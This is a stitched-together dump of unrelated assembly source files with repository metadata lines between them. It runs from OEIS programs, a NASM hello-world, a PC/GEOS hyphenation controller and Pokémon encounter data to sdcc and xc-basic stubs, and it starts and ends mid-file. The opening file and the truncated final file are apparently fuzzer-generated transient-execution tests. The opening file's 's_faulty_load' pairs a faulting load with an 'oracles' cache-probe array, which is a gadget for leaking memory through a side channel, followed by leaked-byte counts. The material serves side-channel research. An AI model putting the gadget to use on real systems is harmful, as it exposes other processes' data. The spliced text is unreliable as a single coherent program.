movups %xmm2, (%rcx)
nop
nop
nop
inc %rcx
lea addresses_UC_ht+0x88de, %r10
nop
inc %r9
vmovups (%r10), %ymm1
vextracti128 $1, %ymm1, %xmm1
vpextrq $1, %xmm1, %r14
nop
nop
nop
sub $41275, %rbx
lea addresses_WT_ht+0x1d7d7, %rbx
nop
nop
and %rdx, %rdx
mov (%rbx), %r8d
sub %r10, %r10
lea addresses_WT_ht+0x167c9, %r9
and $35850, %r8
movl $0x61626364, (%r9)
nop
nop
inc %r9
lea addresses_A_ht+0x8409, %r14
add $55440, %rcx
movb (%r14), %r10b
nop
nop
nop
nop
cmp $22046, %r10
lea addresses_UC_ht+0xf689, %rsi
lea addresses_UC_ht+0x9ae9, %rdi
nop
add $63751, %r14
mov $36, %rcx
rep movsq
sub %r8, %r8
lea addresses_normal_ht+0x2b09, %rsi
nop
sub %r10, %r10
mov $0x6162636465666768, %r9
movq %r9, %xmm2
movups %xmm2, (%rsi)
nop
nop
sub $61148, %rdx
lea addresses_WC_ht+0x1367d, %rsi
clflush (%rsi)
nop
nop
dec %rdi
mov $0x6162636465666768, %r10
movq %r10, %xmm2
vmovups %ymm2, (%rsi)
nop
nop
nop
nop
and %rcx, %rcx
pop %rsi
pop %rdx
pop %rdi
pop %rcx
pop %rbx
pop %r9
pop %r8
pop %r14
pop %r10
ret
.global s_faulty_load
s_faulty_load:
push %r10
push %r11
push %r13
push %r8
push %rbp
push %rcx
push %rdi
// Load
lea addresses_WC+0x156e9, %r8
clflush (%r8)
nop
add %rdi, %rdi
mov (%r8), %r13w
// Exception!!!
nop
mov (0), %rdi
sub %r8, %r8
// Store
lea addresses_US+0x5209, %rbp
nop
nop
nop
nop
nop
add $42362, %r11
movw $0x5152, (%rbp)
nop
sub %rcx, %rcx
// Store
lea addresses_WC+0x17c09, %r13
nop
nop
and $62768, %rdi
mov $0x5152535455565758, %rcx
movq %rcx, %xmm2
movaps %xmm2, (%r13)
nop
nop
nop
nop
and %rcx, %rcx
// Store
lea addresses_RW+0x19389, %rcx
nop
nop
nop
nop
nop
dec %rdi
mov $0x5152535455565758, %rbp
movq %rbp, %xmm1
vmovups %ymm1, (%rcx)
nop
nop
nop
xor $759, %rcx
// Faulty Load
lea addresses_WC+0x1c909, %rcx
nop
and $60601, %r13
movups (%rcx), %xmm7
vpextrq $1, %xmm7, %rdi
lea oracles, %r13
and $0xff, %rdi
shlq $12, %rdi
mov (%r13,%rdi,1), %rdi
pop %rdi
pop %rcx
pop %rbp
pop %r8
pop %r13
pop %r11
pop %r10
ret
/*
<gen_faulty_load>
[REF]
{'src': {'NT': False, 'same': False, 'congruent': 0, 'type': 'addresses_WC', 'AVXalign': False, 'size': 8}, 'OP': 'LOAD'}
{'src': {'NT': False, 'same': False, 'congruent': 5, 'type': 'addresses_WC', 'AVXalign': False, 'size': 2}, 'OP': 'LOAD'}
{'OP': 'STOR', 'dst': {'NT': False, 'same': False, 'congruent': 8, 'type': 'addresses_US', 'AVXalign': False, 'size': 2}}
{'OP': 'STOR', 'dst': {'NT': False, 'same': False, 'congruent': 8, 'type': 'addresses_WC', 'AVXalign': True, 'size': 16}}
{'OP': 'STOR', 'dst': {'NT': False, 'same': False, 'congruent': 7, 'type': 'addresses_RW', 'AVXalign': False, 'size': 32}}
[Faulty Load]
{'src': {'NT': False, 'same': True, 'congruent': 0, 'type': 'addresses_WC', 'AVXalign': False, 'size': 16}, 'OP': 'LOAD'}
<gen_prepare_buffer>
{'src': {'NT': False, 'same': False, 'congruent': 11, 'type': 'addresses_A_ht', 'AVXalign': False, 'size': 8}, 'OP': 'LOAD'}
{'src': {'NT': False, 'same': False, 'congruent': 1, 'type': 'addresses_WC_ht', 'AVXalign': False, 'size': 4}, 'OP': 'LOAD'}
{'src': {'NT': False, 'same': False, 'congruent': 11, 'type': 'addresses_WT_ht', 'AVXalign': False, 'size': 32}, 'OP': 'LOAD'}
{'src': {'NT': False, 'same': False, 'congruent': 1, 'type': 'addresses_UC_ht', 'AVXalign': False, 'size': 32}, 'OP': 'LOAD'}
{'src': {'NT': False, 'same': False, 'congruent': 8, 'type': 'addresses_UC_ht', 'AVXalign': False, 'size': 1}, 'OP': 'LOAD'}
{'OP': 'STOR', 'dst': {'NT': False, 'same': False, 'congruent': 10, 'type': 'addresses_A_ht', 'AVXalign': False, 'size': 16}}
{'src': {'NT': False, 'same': False, 'congruent': 0, 'type': 'addresses_UC_ht', 'AVXalign': False, 'size': 32}, 'OP': 'LOAD'}
{'src': {'NT': False, 'same': False, 'congruent': 0, 'type': 'addresses_WT_ht', 'AVXalign': False, 'size': 4}, 'OP': 'LOAD'}
{'OP': 'STOR', 'dst': {'NT': False, 'same': False, 'congruent': 4, 'type': 'addresses_WT_ht', 'AVXalign': False, 'size': 4}}
{'src': {'NT': False, 'same': False, 'congruent': 8, 'type': 'addresses_A_ht', 'AVXalign': False, 'size': 1}, 'OP': 'LOAD'}
{'src': {'same': False, 'congruent': 6, 'type': 'addresses_UC_ht'}, 'OP': 'REPM', 'dst': {'same': True, 'congruent': 2, 'type': 'addresses_UC_ht'}}
{'OP': 'STOR', 'dst': {'NT': False, 'same': False, 'congruent': 9, 'type': 'addresses_normal_ht', 'AVXalign': False, 'size': 16}}
{'OP': 'STOR', 'dst': {'NT': False, 'same': False, 'congruent': 2, 'type': 'addresses_WC_ht', 'AVXalign': False, 'size': 32}}
{'48': 23, '49': 975, '08': 2, '00': 20537, '47': 286, 'ff': 3, 'ca': 3}
00 00 00 00 00 00 00 00 00 47 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 49 00 49 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 49 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 49 00 00 00 00 00 00 00 00 00 49 00 00 00 00 00 47 00 00 00 00 49 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 49 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 49 00 00 49 00 00 00 00 00 00 00 00 00 00 00 00 47 00 00 00 00 47 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 49 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 47 49 00 00 00 00 00 00 00 00 00 00 00 00 47 00 00 49 00 00 00 00 00 00 00 47 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 49 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 47 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 47 00 00 00 00 00 00 00 00 00 00 00 00 49 00 00 47 00 00 49 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 49 00 49 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 49 00 00 00 00 00 00 00 00 00 00 00 00 00 49 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 49 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 49 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 47 00 00 00 49 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 49 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 49 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 49 00 00 00 49 00 00 00 00 00 00 49 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 49 00 00 00 00 00 00 00 00 00 00 00 00 00 49 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 49 00 49 00 00 00 00 00 00 00 00 00 00 00 00 49 00 00 00 00 00 00 00 00 00 00 00 00 49 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 49 00 00 00 00 49 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 49 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 49 00 00 00 49 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 49 00 00 00 00 00 49 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 48 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
*/
| 32.664063
| 2,999
| 0.649247
|
abf19aa5b89e8a4416d97a987c72270f1de374a4
| 497
|
asm
|
Assembly
|
oeis/092/A092187.asm
|
neoneye/loda-programs
|
84790877f8e6c2e821b183d2e334d612045d29c0
|
[
"Apache-2.0"
] | 11
|
2021-08-22T19:44:55.000Z
|
2022-03-20T16:47:57.000Z
|
oeis/092/A092187.asm
|
neoneye/loda-programs
|
84790877f8e6c2e821b183d2e334d612045d29c0
|
[
"Apache-2.0"
] | 9
|
2021-08-29T13:15:54.000Z
|
2022-03-09T19:52:31.000Z
|
oeis/092/A092187.asm
|
neoneye/loda-programs
|
84790877f8e6c2e821b183d2e334d612045d29c0
|
[
"Apache-2.0"
] | 3
|
2021-08-22T20:56:47.000Z
|
2021-09-29T06:26:12.000Z
|
; A092187: A092186(n)/2.
; Submitted by Christian Krause
; 1,1,4,6,36,72,576,1440,14400,43200,518400,1814400,25401600,101606400,1625702400,7315660800,131681894400,658409472000,13168189440000,72425041920000,1593350922240000,9560105533440000,229442532802560000,1491376463216640000,38775788043632640000
mov $1,$0
gcd $0,2
seq $1,152875 ; Number of permutations of {1,2,...,n} (n >= 2) with all odd entries preceding all even entries or all even entries preceding all odd entries.
mul $0,$1
div $0,4
| 49.7
| 242
| 0.790744
|
ef9cb49ccb3cf0a7a0d088b220c285da7045acef
| 426
|
asm
|
Assembly
|
tests/automake/helloworld/main.asm
|
agguro/nasm-support
|
f4e64dd47a5279cf7fc9cb6d1182626a5b9add62
|
[
"BSD-2-Clause"
] | 6
|
2020-07-19T18:34:43.000Z
|
2022-03-26T10:21:09.000Z
|
tests/automake/helloworld/main.asm
|
agguro/nasm-support
|
f4e64dd47a5279cf7fc9cb6d1182626a5b9add62
|
[
"BSD-2-Clause"
] | null | null | null |
tests/automake/helloworld/main.asm
|
agguro/nasm-support
|
f4e64dd47a5279cf7fc9cb6d1182626a5b9add62
|
[
"BSD-2-Clause"
] | 3
|
2020-07-19T18:35:10.000Z
|
2021-07-25T17:34:50.000Z
|
;Project: helloworld
;Name: main.asm
;Build: ./make.sh
;Run: ./hello
;Description: Writes 'Hello world!" to STDOUT
[list -]
%include "unistd.inc"
[list +]
bits 64
extern print
section .data
message:db "Hello world!",10
.len: equ $-message
section .text
global _start
_start:
mov rdi,message
mov rsi,message.len
call print
syscall exit
| 15.777778
| 46
| 0.577465
|
84417c36003d1d550999016e98d6125d37747a74
| 11,115
|
asm
|
Assembly
|
Library/Text/UI/uiHyphenation.asm
|
steakknife/pcgeos
|
95edd7fad36df400aba9bab1d56e154fc126044a
|
[
"Apache-2.0"
] | 504
|
2018-11-18T03:35:53.000Z
|
2022-03-29T01:02:51.000Z
|
Library/Text/UI/uiHyphenation.asm
|
steakknife/pcgeos
|
95edd7fad36df400aba9bab1d56e154fc126044a
|
[
"Apache-2.0"
] | 96
|
2018-11-19T21:06:50.000Z
|
2022-03-06T10:26:48.000Z
|
Library/Text/UI/uiHyphenation.asm
|
steakknife/pcgeos
|
95edd7fad36df400aba9bab1d56e154fc126044a
|
[
"Apache-2.0"
] | 73
|
2018-11-19T20:46:53.000Z
|
2022-03-29T00:59:26.000Z
|
COMMENT @-----------------------------------------------------------------------
Copyright (c) GeoWorks 1991 -- All Rights Reserved
PROJECT: PC GEOS
MODULE: Text Library
FILE: uiHyphenationControl.asm
ROUTINES:
Name Description
---- -----------
GLB HyphenationControlClass Style menu object
REVISION HISTORY:
Name Date Description
---- ---- -----------
Doug 7/91 Initial version
DESCRIPTION:
This file contains routines to implement HyphenationControlClass
$Id: uiHyphenation.asm,v 1.1 97/04/07 11:17:04 newdeal Exp $
-------------------------------------------------------------------------------@
;---------------------------------------------------
TextClassStructures segment resource
HyphenationControlClass ;declare the class record
TextClassStructures ends
;---------------------------------------------------
if not NO_CONTROLLERS
TextControlCommon segment resource
COMMENT @----------------------------------------------------------------------
MESSAGE: HyphenationControlGetInfo --
MSG_GEN_CONTROL_GET_INFO for HyphenationControlClass
DESCRIPTION: Return group
PASS:
*ds:si - instance data
es - segment of HyphenationControlClass
ax - The message
cx:dx - GenControlBuildInfo structure to fill in
RETURN:
none
DESTROYED:
bx, si, di, ds, es (message handler)
REGISTER/STACK USAGE:
PSEUDO CODE/STRATEGY:
KNOWN BUGS/SIDE EFFECTS/CAVEATS/IDEAS:
REVISION HISTORY:
Name Date Description
---- ---- -----------
Tony 10/31/91 Initial version
------------------------------------------------------------------------------@
HyphenationControlGetInfo method dynamic HyphenationControlClass,
MSG_GEN_CONTROL_GET_INFO
mov si, offset HC_dupInfo
GOTO CopyDupInfoCommon
HyphenationControlGetInfo endm
HC_dupInfo GenControlBuildInfo <
mask GCBF_SUSPEND_ON_APPLY, ; GCBI_flags
HC_IniFileKey, ; GCBI_initFileKey
HC_gcnList, ; GCBI_gcnList
length HC_gcnList, ; GCBI_gcnCount
HC_notifyTypeList, ; GCBI_notificationList
length HC_notifyTypeList, ; GCBI_notificationCount
HCName, ; GCBI_controllerName
handle HyphenationControlUI, ; GCBI_dupBlock
HC_childList, ; GCBI_childList
length HC_childList, ; GCBI_childCount
HC_featuresList, ; GCBI_featuresList
length HC_featuresList, ; GCBI_featuresCount
HC_DEFAULT_FEATURES, ; GCBI_features
handle HyphenationControlToolboxUI, ; GCBI_toolBlock
HC_toolList, ; GCBI_toolList
length HC_toolList, ; GCBI_toolCount
HC_toolFeaturesList, ; GCBI_toolFeaturesList
length HC_toolFeaturesList, ; GCBI_toolFeaturesCount
HC_DEFAULT_TOOLBOX_FEATURES, ; GCBI_toolFeatures
HC_helpContext> ; GCBI_helpContext
if FULL_EXECUTE_IN_PLACE
ControlInfoXIP segment resource
endif
HC_helpContext char "dbHyph", 0
HC_IniFileKey char "hyphenation", 0
HC_gcnList GCNListType \
<MANUFACTURER_ID_GEOWORKS, GAGCNLT_APP_TARGET_NOTIFY_TEXT_PARA_ATTR_CHANGE>
HC_notifyTypeList NotificationType \
<MANUFACTURER_ID_GEOWORKS, GWNT_TEXT_PARA_ATTR_CHANGE>
;---
HC_childList GenControlChildInfo \
<offset HyphenationGroup, mask HCF_LIST,
mask GCCF_IS_DIRECTLY_A_FEATURE>
; Careful, this table is in the *opposite* order as the record which
; it corresponds to.
HC_featuresList GenControlFeaturesInfo \
<offset HyphenationGroup, HyphenationName, 0>
;---
HC_toolList GenControlChildInfo \
<offset HyphenateToolList, mask HCTF_TOGGLE,
mask GCCF_IS_DIRECTLY_A_FEATURE>
; Careful, this table is in the *opposite* order as the record which
; it corresponds to.
HC_toolFeaturesList GenControlFeaturesInfo \
<offset HyphenateToolList, HyphenationToolName>
if FULL_EXECUTE_IN_PLACE
ControlInfoXIP ends
endif
TextControlCommon ends
;---
TextControlCode segment resource
COMMENT @%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
HyphenationControlSetEnabled
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
DESCRIPTION: Don't set enabled if no USERDATA/DICTS directory.
PASS: *ds:si - HyphenationControlClass object
ds:di - HyphenationControlClass instance data
es - dgroup
RETURN: nothing
DESTROYED: ax, cx, dx, bp
REVISION HISTORY:
Name Date Description
---- ---- -----------
chrisb 2/18/94 Initial version.
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%@
LocalDefNLString dicts <"DICTS",0>
HyphenationControlSetEnabled method dynamic HyphenationControlClass,
MSG_GEN_SET_ENABLED
;
; See if USERDATA/DICTS exists on this system, and if not,
; don't enable the controller. This is a hack, as we should
; really rely on the spell library to tell us whether
; hyphenation is working or not, but it's next to impossible
; to call a routine in the spell library without jumping
; through all kinds of hoops, so...
;
push ds, dx, ax
call FilePushDir
segmov ds, cs
mov dx, offset dicts
mov bx, SP_USER_DATA
call FileSetCurrentPath
call FilePopDir
pop ds, dx, ax
jc notEnabled
callSuper:
mov di, offset HyphenationControlClass
GOTO ObjCallSuperNoLock
exit:
ret
notEnabled:
test ds:[di].GI_states, mask GS_ENABLED
jz exit
mov ax, MSG_GEN_SET_NOT_ENABLED
jmp callSuper
HyphenationControlSetEnabled endm
COMMENT @----------------------------------------------------------------------
MESSAGE: HyphenationControlSetHyphenation -- MSG_HC_SET_HYPHENATION
for HyphenationControlClass
DESCRIPTION: Handle a change in theee "Plain" state
PASS:
*ds:si - instance data
es - segment of HyphenationControlClass
ax - The message
cx - spacing
RETURN:
DESTROYED:
bx, si, di, ds, es (message handler)
REGISTER/STACK USAGE:
PSEUDO CODE/STRATEGY:
KNOWN BUGS/SIDE EFFECTS/CAVEATS/IDEAS:
REVISION HISTORY:
Name Date Description
---- ---- -----------
Tony 10/31/91 Initial version
------------------------------------------------------------------------------@
HyphenationControlSetHyphenation method HyphenationControlClass,
MSG_HC_SET_HYPHENATION
mov bp, mask VTPAA_ALLOW_AUTO_HYPHENATION ;bits changed
GOTO SetParaAttrCommon
HyphenationControlSetHyphenation endm
HyphenationControlUserChangedHyphenation method HyphenationControlClass,
MSG_HC_USER_CHANGED_HYPHENATION
call GetFeaturesAndChildBlock
clr dx
call EnableDisableHyphenation
ret
HyphenationControlUserChangedHyphenation endm
; bx = block, cx = flag
EnableDisableHyphenation proc near uses dx
.enter
tst dx
jnz 10$
mov ax, MSG_GEN_SET_NOT_ENABLED
jcxz common
10$:
mov ax, MSG_GEN_SET_ENABLED
common:
mov dl, VUM_NOW
mov si, offset HyphenationCustomGroup
call ObjMessageSend
.leave
ret
EnableDisableHyphenation endp
COMMENT @----------------------------------------------------------------------
MESSAGE: HyphenationControlSetDropChars -- MSG_HC_SET_DROP_CHARS
for HyphenationControlClass
DESCRIPTION: ...
PASS:
*ds:si - instance data
es - segment of HyphenationControlClass
ax - The message
dx - integer value returned by range
RETURN:
carry - ?
ax - ?
cx - ?
dx - ?
bp - ?
DESTROYED:
bx, si, di, ds, es (message handler)
REGISTER/STACK USAGE:
PSEUDO CODE/STRATEGY:
KNOWN BUGS/SIDE EFFECTS/CAVEATS/IDEAS:
REVISION HISTORY:
Name Date Description
---- ---- -----------
Tony 12/16/91 Initial version
------------------------------------------------------------------------------@
HyphenationControlSetMaxRange method dynamic HyphenationControlClass,
MSG_HC_SET_MAX_RANGE
mov al, offset VTHI_HYPHEN_MAX_LINES
GOTO HyphenationCommon
HyphenationControlSetMaxRange endm
;---
HyphenationControlSetMinWord method dynamic HyphenationControlClass,
MSG_HC_SET_MIN_WORD
mov al, offset VTHI_HYPHEN_SHORTEST_WORD
GOTO HyphenationCommon
HyphenationControlSetMinWord endm
;---
HyphenationControlSetMinPrefix method dynamic HyphenationControlClass,
MSG_HC_SET_MIN_PREFIX
mov al, offset VTHI_HYPHEN_SHORTEST_PREFIX
GOTO HyphenationCommon
HyphenationControlSetMinPrefix endm
;---
HyphenationControlSetMinSuffix method dynamic HyphenationControlClass,
MSG_HC_SET_MIN_SUFFIX
mov al, offset VTHI_HYPHEN_SHORTEST_SUFFIX
FALL_THRU HyphenationCommon
HyphenationControlSetMinSuffix endm
;---
HyphenationCommon proc far
mov cx, dx
dec cx
xchg ax, cx ;ax = val, cx = count
shl ax, cl
mov_tr bx, ax ;bx = mask
mov ax, 0x000f
shl ax, cl
mov_tr dx, ax ;dx = bits to clear
mov cx, bx
mov ax, MSG_VIS_TEXT_SET_HYPHENATION_PARAMS
GOTO SendVisText_AX_DXCX_Common
HyphenationCommon endp
COMMENT @----------------------------------------------------------------------
MESSAGE: HyphenationControlUpdateUI -- MSG_GEN_CONTROL_UPDATE_UI
for HyphenationControlClass
DESCRIPTION: Handle notification of attributes change
PASS:
*ds:si - instance data
es - segment of HyphenationControlClass
ax - The message
ss:bp - GenControlUpdateUIParams
RETURN:
DESTROYED:
bx, si, di, ds, es (message handler)
REGISTER/STACK USAGE:
PSEUDO CODE/STRATEGY:
KNOWN BUGS/SIDE EFFECTS/CAVEATS/IDEAS:
REVISION HISTORY:
Name Date Description
---- ---- -----------
Tony 11/12/91 Initial version
------------------------------------------------------------------------------@
HyphenationControlUpdateUI method dynamic HyphenationControlClass,
MSG_GEN_CONTROL_UPDATE_UI
; get notification data
mov bx, ss:[bp].GCUUIP_dataBlock
call MemLock
mov es, ax
mov cx, es:VTNPAC_paraAttr.VTMPA_paraAttr.VTPA_attributes
and cx, mask VTPAA_ALLOW_AUTO_HYPHENATION
mov dx, es:VTNPAC_paraAttrDiffs.VTPAD_attributes
and dx, mask VTPAA_ALLOW_AUTO_HYPHENATION
test ss:[bp].GCUUIP_toolboxFeatures, mask HCTF_TOGGLE
jz noHyphenationTool
mov bx, ss:[bp].GCUUIP_toolBlock
mov si, offset HyphenateToolList
call SendListSetViaData
noHyphenationTool:
test ss:[bp].GCUUIP_features, mask HCF_LIST
jz noHyphenation
; set list
mov bx, ss:[bp].GCUUIP_childBlock
mov si, offset HyphenationList
call SendListSetExcl
; enable or disable ranges
call EnableDisableHyphenation
; set ranges
mov cx, es:VTNPAC_paraAttr.VTMPA_paraAttr.\
VTPA_hyphenationInfo
mov dx, es:VTNPAC_paraAttrDiffs.VTPAD_hyphenationInfo
mov al, offset VTHI_HYPHEN_MAX_LINES
mov si, offset HyphenationMaxRange
call SetNibbleRange
mov al, offset VTHI_HYPHEN_SHORTEST_WORD
mov si, offset HyphenationShortestWordRange
call SetNibbleRange
mov al, offset VTHI_HYPHEN_SHORTEST_PREFIX
mov si, offset HyphenationShortestPrefixRange
call SetNibbleRange
mov al, offset VTHI_HYPHEN_SHORTEST_SUFFIX
mov si, offset HyphenationShortestSuffixRange
call SetNibbleRange
noHyphenation:
mov bx, ss:[bp].GCUUIP_dataBlock
call MemUnlock
ret
HyphenationControlUpdateUI endm
TextControlCode ends
endif ; not NO_CONTROLLERS
| 23.449367
| 81
| 0.674944
|
abec2f4c54c3075ef9f1b22e0bd55c0f97a28ce5
| 176
|
asm
|
Assembly
|
data/wildPokemon/pokemontower4.asm
|
adhi-thirumala/EvoYellow
|
6fb1b1d6a1fa84b02e2d982f270887f6c63cdf4c
|
[
"Unlicense"
] | null | null | null |
data/wildPokemon/pokemontower4.asm
|
adhi-thirumala/EvoYellow
|
6fb1b1d6a1fa84b02e2d982f270887f6c63cdf4c
|
[
"Unlicense"
] | null | null | null |
data/wildPokemon/pokemontower4.asm
|
adhi-thirumala/EvoYellow
|
6fb1b1d6a1fa84b02e2d982f270887f6c63cdf4c
|
[
"Unlicense"
] | null | null | null |
TowerMons4:
db $0A
db 20,MISDREAVUS
db 21,VULPIX
db 22,CUBONE
db 23,RATTATA
db 24,GASTLY
db 19,GASTLY
db 18,GASTLY
db 25,GASTLY
db 20,HAUNTER
db 25,HAUNTER
db $00
| 11.733333
| 17
| 0.710227
|
b2e43b16bc43cc4ceab453901dbda661c59fe09e
| 726
|
asm
|
Assembly
|
oeis/291/A291096.asm
|
neoneye/loda-programs
|
84790877f8e6c2e821b183d2e334d612045d29c0
|
[
"Apache-2.0"
] | 11
|
2021-08-22T19:44:55.000Z
|
2022-03-20T16:47:57.000Z
|
oeis/291/A291096.asm
|
neoneye/loda-programs
|
84790877f8e6c2e821b183d2e334d612045d29c0
|
[
"Apache-2.0"
] | 9
|
2021-08-29T13:15:54.000Z
|
2022-03-09T19:52:31.000Z
|
oeis/291/A291096.asm
|
neoneye/loda-programs
|
84790877f8e6c2e821b183d2e334d612045d29c0
|
[
"Apache-2.0"
] | 3
|
2021-08-22T20:56:47.000Z
|
2021-09-29T06:26:12.000Z
|
; A291096: Number of rooted gluings of octahedra with n square vertices.
; Submitted by Christian Krause
; 1,3,36,594,11340,235467,5164236,117704340,2760422652,66179363580,1614629242512,39958835859306,1000667989897524,25310418084553770,645671000841035400,16592979103827051240,429173117580596633820,11163550152596460675012,291848008677713303547312,7664131495707515227650600,202080084873260771332275120,5347730494884813632137318635,141989193730587409482532951980,3781415535336590012638403143140,100984879668843161605121468465700,2703734405322056510031584160576372,72559056131050369760203698637882416
mov $1,$0
mov $0,3
pow $0,$1
seq $1,2293 ; Number of dissections of a polygon: binomial(4*n, n)/(3*n + 1).
mul $1,$0
mov $0,$1
| 66
| 492
| 0.859504
|
ec74a295ead0b7df870290e211cb43cba0cb792f
| 200
|
asm
|
Assembly
|
libsrc/_DEVELOPMENT/fcntl/c/sdcc_iy/read_callee.asm
|
meesokim/z88dk
|
5763c7778f19a71d936b3200374059d267066bb2
|
[
"ClArtistic"
] | null | null | null |
libsrc/_DEVELOPMENT/fcntl/c/sdcc_iy/read_callee.asm
|
meesokim/z88dk
|
5763c7778f19a71d936b3200374059d267066bb2
|
[
"ClArtistic"
] | null | null | null |
libsrc/_DEVELOPMENT/fcntl/c/sdcc_iy/read_callee.asm
|
meesokim/z88dk
|
5763c7778f19a71d936b3200374059d267066bb2
|
[
"ClArtistic"
] | null | null | null |
; ssize_t read_callee(int fd, void *buf, size_t nbyte)
SECTION code_fcntl
PUBLIC _read_callee
EXTERN asm_read
_read_callee:
pop af
pop hl
pop de
pop bc
push af
jp asm_read
| 10.526316
| 54
| 0.69
|
a6184bf85292274a1dbb040ac336ce5ce54d42ff
| 51
|
asm
|
Assembly
|
lib/mem/mem.asm
|
locodarwin/xc-basic3
|
74d73fb4049980fc0c7b648b4893ce3a53056af3
|
[
"MIT"
] | 11
|
2021-08-05T18:13:21.000Z
|
2022-03-26T21:44:50.000Z
|
lib/mem/mem.asm
|
locodarwin/xc-basic3
|
74d73fb4049980fc0c7b648b4893ce3a53056af3
|
[
"MIT"
] | 119
|
2021-08-09T06:28:44.000Z
|
2022-03-31T07:12:11.000Z
|
lib/mem/mem.asm
|
locodarwin/xc-basic3
|
74d73fb4049980fc0c7b648b4893ce3a53056af3
|
[
"MIT"
] | 3
|
2022-01-22T05:25:09.000Z
|
2022-03-26T17:11:55.000Z
|
INCLUDE "mem/_fn.asm"
INCLUDE "mem/_routines.asm"
| 25.5
| 28
| 0.745098
|
72334848be5a90a554e387ebb1c4b33b124a8bac
| 6,546
|
asm
|
Assembly
|
Transynther/x86/_processed/NONE/_zr_/i9-9900K_12_0xa0.log_21829_854.asm
|
ljhsiun2/medusa
|
67d769b8a2fb42c538f10287abaf0e6dbb463f0c
|
[
"MIT"
] | 9
|
2020-08-13T19:41:58.000Z
|
2022-03-30T12:22:51.000Z
|
Transynther/x86/_processed/NONE/_zr_/i9-9900K_12_0xa0.log_21829_854.asm
|
ljhsiun2/medusa
|
67d769b8a2fb42c538f10287abaf0e6dbb463f0c
|
[
"MIT"
] | 1
|
2021-04-29T06:29:35.000Z
|
2021-05-13T21:02:30.000Z
|
Transynther/x86/_processed/NONE/_zr_/i9-9900K_12_0xa0.log_21829_854.asm
|
ljhsiun2/medusa
|
67d769b8a2fb42c538f10287abaf0e6dbb463f0c
|
[
"MIT"
] | 3
|
2020-07-14T17:07:07.000Z
|
2022-03-21T01:12:22.000Z
|
.global s_prepare_buffers
s_prepare_buffers:
push %r10
push %r13
push %r14
push %r8
push %rcx
push %rdi
push %rdx
push %rsi
lea addresses_WC_ht+0x5e08, %rsi
lea addresses_WC_ht+0x71c7, %rdi
nop
nop
nop
nop
nop
inc %r13
mov $97, %rcx
rep movsq
nop
xor %rsi, %rsi
lea addresses_UC_ht+0x10808, %rsi
lea addresses_A_ht+0x7a18, %rdi
nop
nop
nop
nop
nop
add $15209, %r14
mov $108, %rcx
rep movsl
cmp $50607, %rdi
lea addresses_normal_ht+0x19470, %rsi
lea addresses_WC_ht+0x3c18, %rdi
clflush (%rdi)
nop
nop
nop
nop
nop
sub $38628, %r10
mov $78, %rcx
rep movsq
nop
sub %r14, %r14
lea addresses_WC_ht+0x10abd, %rdi
sub %rsi, %rsi
movups (%rdi), %xmm5
vpextrq $0, %xmm5, %r10
nop
nop
nop
nop
xor %r14, %r14
lea addresses_normal_ht+0xc124, %r14
nop
nop
and %r8, %r8
mov (%r14), %r13
nop
dec %rcx
lea addresses_UC_ht+0x6118, %rsi
lea addresses_D_ht+0x1111c, %rdi
nop
nop
nop
nop
nop
dec %rdx
mov $78, %rcx
rep movsl
sub %rdx, %rdx
lea addresses_UC_ht+0x15778, %rdi
clflush (%rdi)
nop
sub %rdx, %rdx
